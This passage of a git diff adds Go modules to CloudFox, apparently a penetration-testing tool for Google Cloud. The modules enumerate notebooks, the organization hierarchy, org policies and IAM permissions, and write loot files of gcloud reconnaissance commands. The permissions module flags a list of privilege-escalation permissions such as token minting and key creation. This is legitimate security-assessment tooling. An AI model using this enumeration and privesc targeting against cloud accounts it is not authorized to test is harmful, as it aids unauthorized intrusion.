+ +Features: +- Lists all notebook instances across locations +- Shows service account configuration +- Identifies public IP exposure +- Checks for GPU attachments +- Analyzes proxy access settings`, + Run: runGCPNotebooksCommand, +} + +type NotebooksModule struct { + gcpinternal.BaseGCPModule + Instances []notebooksservice.NotebookInstanceInfo + Runtimes []notebooksservice.RuntimeInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type NotebooksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NotebooksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NotebooksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NOTEBOOKS_MODULE_NAME) + if err != nil { + return + } + + module := &NotebooksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []notebooksservice.NotebookInstanceInfo{}, + Runtimes: []notebooksservice.RuntimeInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 && len(m.Runtimes) == 0 { + logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) + return + } + + publicCount := 0 + for _, instance := range m.Instances { + if !instance.NoPublicIP { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", + len(m.Instances), publicCount, len(m.Runtimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if 
globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + + svc := notebooksservice.New() + + // Get instances + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NOTEBOOKS_MODULE_NAME, + fmt.Sprintf("Could not list notebook instances in project %s", projectID)) + } else { + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() + } + + // Get runtimes + runtimes, err := svc.ListRuntimes(projectID) + if err == nil { + m.mu.Lock() + m.Runtimes = append(m.Runtimes, runtimes...) + m.mu.Unlock() + } +} + +func (m *NotebooksModule) initializeLootFiles() { + m.LootMap["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceInfo) { + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# State: %s, Service Account: %s\n"+ + "# Public IP: %s, Proxy Access: %s\n", + instance.Name, instance.ProjectID, instance.Location, + instance.State, instance.ServiceAccount, + boolToYesNo(!instance.NoPublicIP), boolToYesNo(!instance.NoProxyAccess), + ) + + if instance.ProxyUri != "" { + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "# Proxy URI: %s\n", instance.ProxyUri) + } + + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n\n"+ + "# Get JupyterLab proxy URL:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)'\n\n"+ + "# Start instance (if stopped):\n"+ 
+ "gcloud notebooks instances start %s --location=%s --project=%s\n\n"+ + "# Stop instance:\n"+ + "gcloud notebooks instances stop %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) +} + +func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Instances table + if len(m.Instances) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } + var body [][]string + for _, instance := range m.Instances { + gpu := "-" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) + } + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + network, + subnet, + boolToYesNo(!instance.NoPublicIP), + boolToYesNo(!instance.NoProxyAccess), + proxyUri, + gpu, + creator, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: header, + Body: body, + }) + } + + // Runtimes table + if len(m.Runtimes) > 0 { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "Network", + 
"Subnet", + } + var body [][]string + for _, runtime := range m.Runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" + } + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } + body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + sa, + network, + subnet, + }) + } + tables = append(tables, internal.TableFile{ + Name: "notebook-runtimes", + Header: header, + Body: body, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := NotebooksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go new file mode 100644 index 00000000..be3f129a --- /dev/null +++ b/gcp/commands/organizations.go @@ -0,0 +1,392 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrganizationsCommand = &cobra.Command{ + Use: globals.GCP_ORGANIZATIONS_MODULE_NAME, + Aliases: []string{"org", "orgs", "hierarchy"}, + Short: "Enumerate 
GCP organization hierarchy",
	Long: `Enumerate GCP organization, folder, and project hierarchy.

Features:
- Lists accessible organizations
- Shows folder structure
- Maps project relationships
- Displays resource hierarchy tree
- Shows ancestry paths for projects`,
	Run: runGCPOrganizationsCommand,
}

// ------------------------------
// Module Struct with embedded BaseGCPModule
// ------------------------------

// OrganizationsModule collects the resource hierarchy (organizations, folders,
// projects, and per-project ancestry chains). Enumeration here is sequential,
// so no mutex is needed.
type OrganizationsModule struct {
	gcpinternal.BaseGCPModule

	// Module-specific fields
	Organizations []orgsservice.OrganizationInfo
	Folders       []orgsservice.FolderInfo
	Projects      []orgsservice.ProjectInfo
	Ancestry      [][]orgsservice.HierarchyNode // one ancestry chain per in-scope project
	LootMap       map[string]*internal.LootFile
}

// ------------------------------
// Output Struct implementing CloudfoxOutput interface
// ------------------------------
type OrganizationsOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o OrganizationsOutput) TableFiles() []internal.TableFile { return o.Table }
func (o OrganizationsOutput) LootFiles() []internal.LootFile   { return o.Loot }

// ------------------------------
// Command Entry Point
// ------------------------------

// runGCPOrganizationsCommand is the cobra Run handler: it builds the module
// from the shared command context and kicks off enumeration.
func runGCPOrganizationsCommand(cmd *cobra.Command, args []string) {
	// Initialize command context
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGANIZATIONS_MODULE_NAME)
	if err != nil {
		return // Error already logged
	}

	// Create module instance
	module := &OrganizationsModule{
		BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx),
		Organizations: []orgsservice.OrganizationInfo{},
		Folders:       []orgsservice.FolderInfo{},
		Projects:      []orgsservice.ProjectInfo{},
		Ancestry:      [][]orgsservice.HierarchyNode{},
		LootMap:       make(map[string]*internal.LootFile),
	}

	// Initialize loot files
	module.initializeLootFiles()

	// Execute enumeration
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}

// ------------------------------
// Module Execution
// ------------------------------

// Execute enumerates the hierarchy. Each enumeration step is best-effort:
// failures are logged at info level and the remaining steps still run.
func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logger) {
	orgsSvc := orgsservice.New()

	// Get organizations
	orgs, err := orgsSvc.SearchOrganizations()
	if err != nil {
		logger.InfoM(fmt.Sprintf("Could not enumerate organizations: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME)
	} else {
		m.Organizations = orgs
	}

	// Get all folders
	folders, err := orgsSvc.SearchAllFolders()
	if err != nil {
		logger.InfoM(fmt.Sprintf("Could not enumerate folders: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME)
	} else {
		m.Folders = folders
	}

	// Get all projects (empty filter = everything visible to the caller)
	projects, err := orgsSvc.SearchProjects("")
	if err != nil {
		logger.InfoM(fmt.Sprintf("Could not enumerate projects: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME)
	} else {
		m.Projects = projects
	}

	// Get ancestry for each specified project
	for _, projectID := range m.ProjectIDs {
		ancestry, err := orgsSvc.GetProjectAncestry(projectID)
		if err != nil {
			logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s: %v", projectID, err), globals.GCP_ORGANIZATIONS_MODULE_NAME)
		} else {
			m.Ancestry = append(m.Ancestry, ancestry)
		}
	}

	// Generate loot
	m.generateLoot()

	// Report findings
	logger.SuccessM(fmt.Sprintf("Found %d organization(s), %d folder(s), %d project(s)",
		len(m.Organizations), len(m.Folders), len(m.Projects)), globals.GCP_ORGANIZATIONS_MODULE_NAME)

	// Write output
	m.writeOutput(ctx, logger)
}

// ------------------------------
// Loot File Management
// ------------------------------

// initializeLootFiles seeds the commands loot file with its header.
func (m *OrganizationsModule) initializeLootFiles() {
	m.LootMap["organizations-commands"] = &internal.LootFile{
		Name:     "organizations-commands",
		Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n",
	}
}

// generateLoot renders an ASCII hierarchy tree plus ready-to-run gcloud
// commands for each organization and folder into the loot file.
func (m *OrganizationsModule) generateLoot() {
	// Hierarchy visualization
m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION HIERARCHY\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) + + // Find folders directly under this org + for _, folder := range m.Folders { + if folder.Parent == org.Name { + m.addFolderToHierarchy(folder, 1) + } + } + + // Find projects directly under this org + for _, proj := range m.Projects { + if proj.Parent == org.Name { + m.LootMap["organizations-commands"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) + } + } + m.LootMap["organizations-commands"].Contents += "\n" + } + + // Gcloud commands for organizations + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Organization: %s (%s)\n"+ + "gcloud organizations describe %s\n"+ + "gcloud organizations get-iam-policy %s\n"+ + "gcloud resource-manager folders list --organization=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + org.DisplayName, orgID, + orgID, + orgID, + orgID, + orgID, + ) + } + + // Gcloud commands for folders + if len(m.Folders) > 0 { + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# FOLDER COMMANDS\n" + 
m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Folder: %s (%s)\n"+ + "gcloud resource-manager folders describe %s\n"+ + "gcloud resource-manager folders get-iam-policy %s\n"+ + "gcloud resource-manager folders list --folder=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + folder.DisplayName, folderID, + folderID, + folderID, + folderID, + folderID, + ) + } + } +} + +func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo, depth int) { + indent := strings.Repeat(" ", depth) + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) + + // Find child folders + for _, childFolder := range m.Folders { + if childFolder.Parent == folder.Name { + m.addFolderToHierarchy(childFolder, depth+1) + } + } + + // Find projects under this folder + for _, proj := range m.Projects { + if proj.Parent == folder.Name { + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Organizations table + orgsHeader := []string{ + "Organization ID", + "Display Name", + "State", + "Directory ID", + } + + var orgsBody [][]string + for _, org := range m.Organizations { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgsBody = append(orgsBody, []string{ + orgID, + org.DisplayName, + org.State, + org.DirectoryID, + }) + } + + // Folders table + foldersHeader := []string{ + "Folder ID", + "Display Name", + "Parent", + "State", + } + + var 
foldersBody [][]string + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + foldersBody = append(foldersBody, []string{ + folderID, + folder.DisplayName, + folder.Parent, + folder.State, + }) + } + + // Projects table + projectsHeader := []string{ + "Project ID", + "Project Name", + "Display Name", + "Parent", + "State", + } + + var projectsBody [][]string + for _, proj := range m.Projects { + projectsBody = append(projectsBody, []string{ + proj.ProjectID, + m.GetProjectName(proj.ProjectID), + proj.DisplayName, + proj.Parent, + proj.State, + }) + } + + // Ancestry table + ancestryHeader := []string{ + "Project ID", + "Project Name", + "Ancestry Path", + } + + var ancestryBody [][]string + for _, ancestry := range m.Ancestry { + if len(ancestry) > 0 { + // Build ancestry path string + var path []string + projectID := "" + for _, node := range ancestry { + if node.Type == "project" { + projectID = node.ID + } + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) + } + ancestryBody = append(ancestryBody, []string{ + projectID, + m.GetProjectName(projectID), + strings.Join(path, " -> "), + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(orgsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "organizations", + Header: orgsHeader, + Body: orgsBody, + }) + } + + if len(foldersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "folders", + Header: foldersHeader, + Body: foldersBody, + }) + } + + if len(projectsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "projects", + Header: projectsHeader, + Body: projectsBody, + }) + } + + if len(ancestryBody) > 0 { + tables = append(tables, 
internal.TableFile{ + Name: "ancestry", + Header: ancestryHeader, + Body: ancestryBody, + }) + } + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go new file mode 100644 index 00000000..9f9d961b --- /dev/null +++ b/gcp/commands/orgpolicies.go @@ -0,0 +1,239 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrgPoliciesCommand = &cobra.Command{ + Use: globals.GCP_ORGPOLICIES_MODULE_NAME, + Aliases: []string{"orgpolicy", "policies"}, + Short: "Enumerate organization policies and identify security weaknesses", + Long: `Enumerate GCP organization policies to identify security configuration weaknesses. + +Organization policies control security constraints across GCP resources. This module +identifies policies that may be misconfigured or weakened, creating security risks. 
+ +Security-Relevant Policies Analyzed: +- Domain restrictions (iam.allowedPolicyMemberDomains) +- Service account key controls (iam.disableServiceAccountKeyCreation) +- Workload identity restrictions +- Compute security (Shielded VM, OS Login, external IPs) +- Storage security (public access, uniform access) +- SQL security (public IPs, authorized networks) +- GKE security (public endpoints) +- Resource location restrictions + +Risk Indicators: +- AllowAll: Policy allows any value (HIGH risk) +- Wildcard patterns: Overly permissive allowed values +- Unenforced: Security constraint not enabled +- Override: Project overrides parent restrictions`, + Run: runGCPOrgPoliciesCommand, +} + +type OrgPoliciesModule struct { + gcpinternal.BaseGCPModule + Policies []orgpolicyservice.OrgPolicyInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type OrgPoliciesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrgPoliciesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrgPoliciesOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGPOLICIES_MODULE_NAME) + if err != nil { + return + } + + module := &OrgPoliciesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Policies: []orgpolicyservice.OrgPolicyInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) + + if len(m.Policies) == 0 { + logger.InfoM("No organization policies found (may require orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d 
organization policy(ies)", len(m.Policies)), globals.GCP_ORGPOLICIES_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + svc := orgpolicyservice.New() + policies, err := svc.ListProjectPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ORGPOLICIES_MODULE_NAME, + fmt.Sprintf("Could not enumerate org policies in project %s", projectID)) + return + } + + m.mu.Lock() + m.Policies = append(m.Policies, policies...) + for _, policy := range policies { + m.addPolicyToLoot(policy) + } + m.mu.Unlock() +} + +func (m *OrgPoliciesModule) initializeLootFiles() { + m.LootMap["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInfo) { + // Extract short constraint name for commands + constraintName := policy.Constraint + if strings.HasPrefix(constraintName, "constraints/") { + constraintName = strings.TrimPrefix(constraintName, "constraints/") + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "## Constraint: %s (Project: %s)\n", + policy.Constraint, policy.ProjectID, + ) + + if policy.Description != "" { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), + ) + + if 
len(policy.AllowedValues) > 0 { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) + } + if len(policy.DeniedValues) > 0 { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "\n# Describe this policy:\n"+ + "gcloud org-policies describe %s --project=%s\n\n"+ + "# Get effective policy (includes inheritance):\n"+ + "gcloud org-policies describe %s --project=%s --effective\n\n", + constraintName, policy.ProjectID, + constraintName, policy.ProjectID, + ) +} + +func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main policies table + header := []string{ + "Project Name", + "Project ID", + "Constraint", + "Description", + "Enforced", + "Allow All", + "Deny All", + "Inherit", + "Allowed Values", + "Denied Values", + } + + var body [][]string + for _, policy := range m.Policies { + description := policy.Description + if description == "" { + description = "-" + } + + allowedValues := "-" + if len(policy.AllowedValues) > 0 { + allowedValues = strings.Join(policy.AllowedValues, ", ") + } + + deniedValues := "-" + if len(policy.DeniedValues) > 0 { + deniedValues = strings.Join(policy.DeniedValues, ", ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Constraint, + description, + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), + allowedValues, + deniedValues, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: 
"orgpolicies", + Header: header, + Body: body, + }, + } + + output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go new file mode 100644 index 00000000..c3ec89b0 --- /dev/null +++ b/gcp/commands/permissions.go @@ -0,0 +1,740 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPermissionsCommand = &cobra.Command{ + Use: globals.GCP_PERMISSIONS_MODULE_NAME, + Aliases: []string{"perms", "privs"}, + Short: "Enumerate ALL permissions for each IAM entity with full inheritance explosion", + Long: `Enumerate ALL permissions for each IAM entity with complete inheritance explosion. 
+ +This module provides COMPLETE permission visibility by: +- Enumerating organization-level IAM bindings (top of hierarchy) +- Enumerating folder-level IAM bindings (inherited to child resources) +- Enumerating project-level IAM bindings (resource-specific) +- EXPLODING every role into its individual permissions (one line per permission) +- Tracking the exact inheritance source for each permission +- Expanding group memberships to show inherited permissions +- Identifying cross-project access patterns +- Flagging dangerous/privesc permissions + +Output: Single unified table with one row per permission entry.`, + Run: runGCPPermissionsCommand, +} + +// High-privilege permission prefixes that should be flagged +var highPrivilegePermissionPrefixes = []string{ + "iam.serviceAccounts.actAs", + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.getOpenIdToken", + "iam.serviceAccounts.implicitDelegation", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + "iam.serviceAccountKeys.create", + "iam.roles.create", + "iam.roles.update", + "resourcemanager.projects.setIamPolicy", + "resourcemanager.folders.setIamPolicy", + "resourcemanager.organizations.setIamPolicy", + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + "compute.projects.setCommonInstanceMetadata", + "storage.buckets.setIamPolicy", + "storage.objects.setIamPolicy", + "cloudfunctions.functions.setIamPolicy", + "run.services.setIamPolicy", + "secretmanager.secrets.setIamPolicy", + "deploymentmanager.deployments.create", + "cloudbuild.builds.create", + "container.clusters.getCredentials", + "orgpolicy.policy.set", +} + +// ExplodedPermission represents a single permission entry with full context +type ExplodedPermission struct { + Entity string + EntityType string + EntityEmail string + Permission string + Role string + RoleType string + ResourceScope string + ResourceScopeType string + ResourceScopeID string + ResourceScopeName string + InheritedFrom string + 
IsInherited bool + HasCondition bool + Condition string + ConditionTitle string + EffectiveProject string + ProjectName string + IsCrossProject bool + SourceProject string + IsHighPrivilege bool +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type PermissionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + ExplodedPerms []ExplodedPermission + EntityPermissions []IAMService.EntityPermissions + GroupInfos []IAMService.GroupInfo + OrgBindings []IAMService.PolicyBinding + FolderBindings map[string][]IAMService.PolicyBinding + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type PermissionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PermissionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) + if err != nil { + return + } + + module := &PermissionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExplodedPerms: []ExplodedPermission{}, + EntityPermissions: []IAMService.EntityPermissions{}, + GroupInfos: []IAMService.GroupInfo{}, + OrgBindings: []IAMService.PolicyBinding{}, + FolderBindings: make(map[string][]IAMService.PolicyBinding), + LootMap: make(map[string]*internal.LootFile), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// 
------------------------------ +// Module Execution +// ------------------------------ +func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + + // First, try to enumerate organization-level bindings + m.enumerateOrganizationBindings(ctx, logger) + + // Run project enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) + + if len(m.ExplodedPerms) == 0 { + logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + return + } + + // Count statistics + uniqueEntities := make(map[string]bool) + uniquePerms := make(map[string]bool) + inheritedCount := 0 + crossProjectCount := 0 + highPrivCount := 0 + + for _, ep := range m.ExplodedPerms { + uniqueEntities[ep.Entity] = true + uniquePerms[ep.Permission] = true + if ep.IsInherited { + inheritedCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + if ep.IsHighPrivilege { + highPrivCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", + len(m.ExplodedPerms), len(uniqueEntities)), 